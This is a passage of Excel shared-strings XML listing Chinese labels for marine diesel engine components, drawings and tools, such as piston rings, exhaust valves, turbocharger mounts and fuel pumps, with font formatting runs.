        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头导轨</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞头毛坯</t>
    </r>
  </si>
  <si>
    <r>
      <t>C8</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环质量控制规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞裙尺寸检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞运动</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞裙质量说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却出口</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>火焰防护装置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封环布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀外形图</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀螺母拧紧规格</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>拔取工具</t>
    </r>
  </si>
  <si>
    <r>
      <t>KAIS</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀模板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种燃油阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴承和衬套布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>红套工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>选择</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>有关</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型环的信息</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮箱简图</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>齿轮传动机构布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压马达</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气分配传动</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮锁变更</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>仪表焊接座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>热感应配件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>水压力计</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧垫圈</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多样的</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>侧板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>比较器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵总成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>正时测量</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>制动缸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装点</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空气定位器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>启动空气消音器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铸钢维修说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气缸支架</t>
    </r>
  </si>
  <si>
    <r>
      <t>PTO</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>力矩平衡器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器规格</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>挡板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>紧急鼓风机布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电路板</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减振器布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>吸气管布置</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接的排气阀管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>温度测量</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接的排气阀弯头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的排气阀弯头</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接的支管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中间接管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>螺栓连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器横向管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型管上端螺栓连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型管下端螺栓连接</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>T</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>型管下端夹具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅螺栓连接固定器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>出口管绝缘</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气阀出口管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气管补充</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管各种详述</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <t>L-GFC</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>消音器列表</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>格栅拆除</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扭振减振器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压推力工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>液压螺母</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>润滑油滤器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力调节器安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水冷却泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>夹箍连接的进气管</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>低负荷阀</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>清洗工具布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>化学清洗布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>中层托架</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>凸轮侧中层托架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊部件布置</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>专用底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>排气集管底座</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>涡轮增压器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>空冷器底座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气集管处平台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
